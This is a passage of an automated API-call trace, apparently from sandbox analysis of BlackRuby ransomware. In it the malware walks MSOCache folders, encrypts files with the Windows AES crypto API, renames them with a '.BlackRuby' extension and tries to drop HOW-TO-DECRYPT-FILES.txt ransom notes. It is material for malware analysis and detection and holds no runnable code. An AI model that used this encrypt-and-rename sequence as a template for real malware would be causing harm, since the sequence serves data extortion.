[0047.174] GetLastError () returned 0x0 [0047.207] CryptImportKey (in: hProv=0x37c680, pbData=0x1cd135c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360aa0) returned 1 [0047.207] GetLastError () returned 0x0 [0047.207] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.207] GetLastError () returned 0x0 [0047.212] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ee0) returned 1 [0047.212] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1cfe3a8*=0x1, dwFlags=0x0) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1cfe374, dwFlags=0x0) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cfe3f0*, pdwDataLen=0x18ed08*=0x640, dwBufLen=0x640 | out: pbData=0x1cfe3f0*, pdwDataLen=0x18ed08*=0x640) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cff09c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cff09c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cff0cc*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cff0cc*, pdwDataLen=0x18ed28*=0x10) returned 1 [0047.212] GetLastError () returned 0x0 [0047.212] CryptDestroyKey (hKey=0x360aa0) returned 1 [0047.212] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.212] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.213] GetLastError () returned 0x0 [0047.213] SetErrorMode (uMode=0x1) returned 0x0 [0047.213] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.214] GetLastError () returned 0xb7 [0047.214] GetFileType (hFile=0x184) returned 0x1 [0047.214] SetErrorMode (uMode=0x0) returned 0x1 [0047.214] GetFileType (hFile=0x184) returned 0x1 [0047.215] CloseHandle (hObject=0x184) returned 1 [0047.215] GetLastError () returned 0xb7 [0047.215] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.215] GetLastError () returned 0xb7 [0047.215] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_3eFFwaUmleXcNYNdN7renHL4iGEMvORxVdvR.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_3eFFwaUmleXcNYNdN7renHL4iGEMvORxVdvR.BlackRuby", lpFilePart=0x0) returned 0x84 [0047.215] GetLastError () returned 0xb7 [0047.215] SetErrorMode (uMode=0x1) returned 0x0 [0047.215] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x24589380, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0047.215] GetLastError () returned 0xb7 [0047.215] SetErrorMode (uMode=0x0) returned 0x1 [0047.215] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_3eFFwaUmleXcNYNdN7renHL4iGEMvORxVdvR.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\encrypted_3effwaumlexcnyndn7renhl4igemvorxvdvr.blackruby")) returned 1 [0047.216] GetLastError () returned 0xb7 [0047.216] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x64 [0047.216] GetLastError () returned 0xb7 [0047.216] SetErrorMode (uMode=0x1) returned 0x0 [0047.216] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.216] GetLastError () returned 0x5 [0047.217] SetErrorMode (uMode=0x0) returned 0x1 [0047.217] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpFilePart=0x0) returned 0x55 [0047.217] GetLastError () returned 0x5 [0047.217] SetErrorMode (uMode=0x1) returned 0x0 [0047.217] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1d1e9e8 | out: lpFileInformation=0x1d1e9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3b11b720, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1ab57a0)) returned 1 [0047.217] GetLastError () returned 0x5 [0047.217] SetErrorMode (uMode=0x0) returned 0x1 [0047.220] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x64 [0047.220] GetLastError () returned 0x5 [0047.220] SetErrorMode (uMode=0x1) returned 0x0 [0047.221] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.221] GetLastError () returned 0x5 [0047.221] SetErrorMode (uMode=0x0) returned 0x1 [0047.222] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.222] GetLastError () returned 0x5 [0047.222] SetErrorMode (uMode=0x1) returned 0x0 [0047.222] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b40e30 | out: lpFileInformation=0x1b40e30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x3bd02520, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0047.222] GetLastError () returned 0x5 [0047.222] SetErrorMode (uMode=0x0) returned 0x1 [0047.222] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.222] GetLastError () returned 0x5 [0047.222] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.222] GetLastError () returned 0x5 [0047.222] SetErrorMode (uMode=0x1) returned 0x0 [0047.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.222] GetLastError () returned 0x0 [0047.222] GetFileType (hFile=0x184) returned 0x1 [0047.222] SetErrorMode (uMode=0x0) returned 0x1 [0047.222] GetFileType (hFile=0x184) returned 0x1 [0047.222] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x91975 [0047.222] GetLastError () returned 0x0 [0047.224] ReadFile (in: hFile=0x184, lpBuffer=0x301c3e0, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x301c3e0*, lpNumberOfBytesRead=0x18ed18*=0x91975, lpOverlapped=0x0) returned 1 [0047.259] GetLastError () returned 0x0 [0047.259] CloseHandle (hObject=0x184) returned 1 [0047.259] GetLastError () returned 0x0 [0047.270] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.270] GetLastError () returned 0x0 [0047.270] SetErrorMode (uMode=0x1) returned 0x0 [0047.270] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x3bd02520, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0047.270] GetLastError () returned 0x0 [0047.270] SetErrorMode (uMode=0x0) returned 0x1 [0047.270] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0047.270] GetLastError () returned 0x0 [0047.307] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b9d114, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ee0) returned 1 [0047.307] GetLastError () returned 0x0 [0047.308] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.308] GetLastError () returned 0x0 [0047.313] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.313] GetLastError () returned 0x0 [0047.313] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360c20) returned 1 [0047.313] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.313] GetLastError () returned 0x0 [0047.313] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1bca160*=0x1, dwFlags=0x0) returned 1 [0047.313] GetLastError () returned 0x0 [0047.313] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1bca12c, dwFlags=0x0) returned 1 [0047.313] GetLastError () returned 0x0 [0047.319] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x313f810*, pdwDataLen=0x18ed08*=0x91a70, dwBufLen=0x91a70 | out: pbData=0x313f810*, pdwDataLen=0x18ed08*=0x91a70) returned 1 [0047.323] GetLastError () returned 0x0 [0047.338] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b22b58*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b22b58*, pdwDataLen=0x18ed20*=0x10) returned 1 [0047.338] GetLastError () returned 0x0 [0047.338] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b22b88*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b22b88*, pdwDataLen=0x18ed28*=0x10) returned 1 [0047.338] GetLastError () returned 0x0 [0047.344] CryptDestroyKey (hKey=0x360ee0) returned 1 [0047.344] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.344] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.344] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.344] GetLastError () returned 0x0 [0047.344] SetErrorMode (uMode=0x1) returned 0x0 [0047.345] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.350] GetLastError () returned 0xb7 [0047.350] GetFileType (hFile=0x184) returned 0x1 [0047.350] SetErrorMode (uMode=0x0) returned 0x1 [0047.350] GetFileType (hFile=0x184) returned 0x1 [0047.360] CloseHandle (hObject=0x184) returned 1 [0047.360] GetLastError () returned 0xb7 [0047.360] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0047.360] GetLastError () returned 0xb7 [0047.360] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_pVHT2e5b7HEvpSiNWM4tJElfwfMLmjorg4xNqdMavC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_pVHT2e5b7HEvpSiNWM4tJElfwfMLmjorg4xNqdMavC.BlackRuby", lpFilePart=0x0) returned 0x8a [0047.360] GetLastError () returned 0xb7 [0047.360] SetErrorMode (uMode=0x1) returned 0x0 [0047.360] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x246dffe0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x91a80)) returned 1 [0047.360] GetLastError () returned 0xb7 [0047.360] SetErrorMode (uMode=0x0) returned 0x1 [0047.360] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Encrypted_pVHT2e5b7HEvpSiNWM4tJElfwfMLmjorg4xNqdMavC.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\encrypted_pvht2e5b7hevpsinwm4tjelfwfmlmjorg4xnqdmavc.blackruby")) returned 1 [0047.360] GetLastError () returned 0xb7 [0047.361] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x64 [0047.361] GetLastError () returned 0xb7 [0047.361] SetErrorMode (uMode=0x1) returned 0x0 [0047.361] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.361] GetLastError () returned 0x5 [0047.363] SetErrorMode (uMode=0x0) returned 0x1 [0047.363] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.363] GetLastError () returned 0x5 [0047.363] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.363] GetLastError () returned 0x5 [0047.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.363] GetLastError () returned 0x5 [0047.363] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.363] GetLastError () returned 0x5 [0047.363] SetErrorMode (uMode=0x1) returned 0x0 [0047.363] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.373] GetLastError () returned 0x5 [0047.373] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.373] GetLastError () returned 0x5 [0047.373] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.373] GetLastError () returned 0x5 [0047.373] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.373] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.374] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.374] GetLastError () returned 0x5 [0047.375] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.375] GetLastError () returned 0x5 [0047.375] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.375] GetLastError () returned 0x5 [0047.375] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.375] GetLastError () returned 0x5 [0047.375] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.375] GetLastError () returned 0x5 [0047.375] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.375] GetLastError () returned 0x12 [0047.375] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.376] SetErrorMode (uMode=0x0) returned 0x1 [0047.376] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.376] GetLastError () returned 0x12 [0047.376] SetErrorMode (uMode=0x1) returned 0x0 [0047.376] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.377] GetLastError () returned 0x12 [0047.377] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.377] GetLastError () returned 0x12 [0047.377] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.377] GetLastError () returned 0x12 [0047.377] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.377] GetLastError () returned 0x12 [0047.377] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.377] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.378] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.378] GetLastError () returned 0x12 [0047.379] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.379] GetLastError () returned 0x12 [0047.379] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.379] GetLastError () returned 0x12 [0047.379] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.379] 